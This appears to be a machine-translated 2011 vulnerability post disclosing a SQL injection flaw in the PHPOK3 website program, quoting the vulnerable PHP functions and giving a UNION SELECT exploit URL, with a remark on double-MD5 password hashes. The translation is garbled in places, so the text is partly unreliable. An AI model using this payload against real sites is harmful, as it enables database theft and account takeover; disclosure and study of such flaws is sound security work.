PHPOK3 business website built Station program injection-vulnerability warning-the black bar safety net

ID MYHACK58:62201128820
Type myhack58
Reporter 佚名
Modified 2011-01-11T00:00:00


Author: jsbug original: Friends always stepping on my body to embark on DOTA Super God of the road, see the forum someone said phpok, taking advantage of the weekend, send on the head a gold, hope you can also be super-God. “phpok3/app/www/models/upfile.php”: the //By ID string to obtain image information, where the access with the ID of the thumbnail function piclist($idstring="") { if(!$ idstring) { return false; } $sql = "SELECT id,thumb url FROM ".$ this->db->prefix."upfiles WHERE id IN(".$ idstring.") ORDER BY substring_index('".$ idstring."', id,1)"; echo($sql); return $this->db->get_all($sql); }

IN() the problem here, somewhat similar to the year of the“Dz5. 0”“pm.php”vulnerabilities. “phpok3/app/www/control/open.php”: the //By Ajax the preview picture function ajax_preview_img_f() { //Here just to prevent cross-site and filter the bad $idstring = $this->trans_lib->safe("idstring"); if(!$ idstring) { exit("empty"); } //Directly into the $rslist = $this->upfile_m->piclist($idstring); sys_html2js($this->json_lib->encode($rslist)); }

There are a few of the same type will not repeat them here. Attached Exp: the http://localhost/phpok3/index.php?c=open&f=ajax_preview_img&idstring=0) union select 1,version()%2 3

Password twice MD5, of course you can also directly run the Session (didn't test, I casually said to).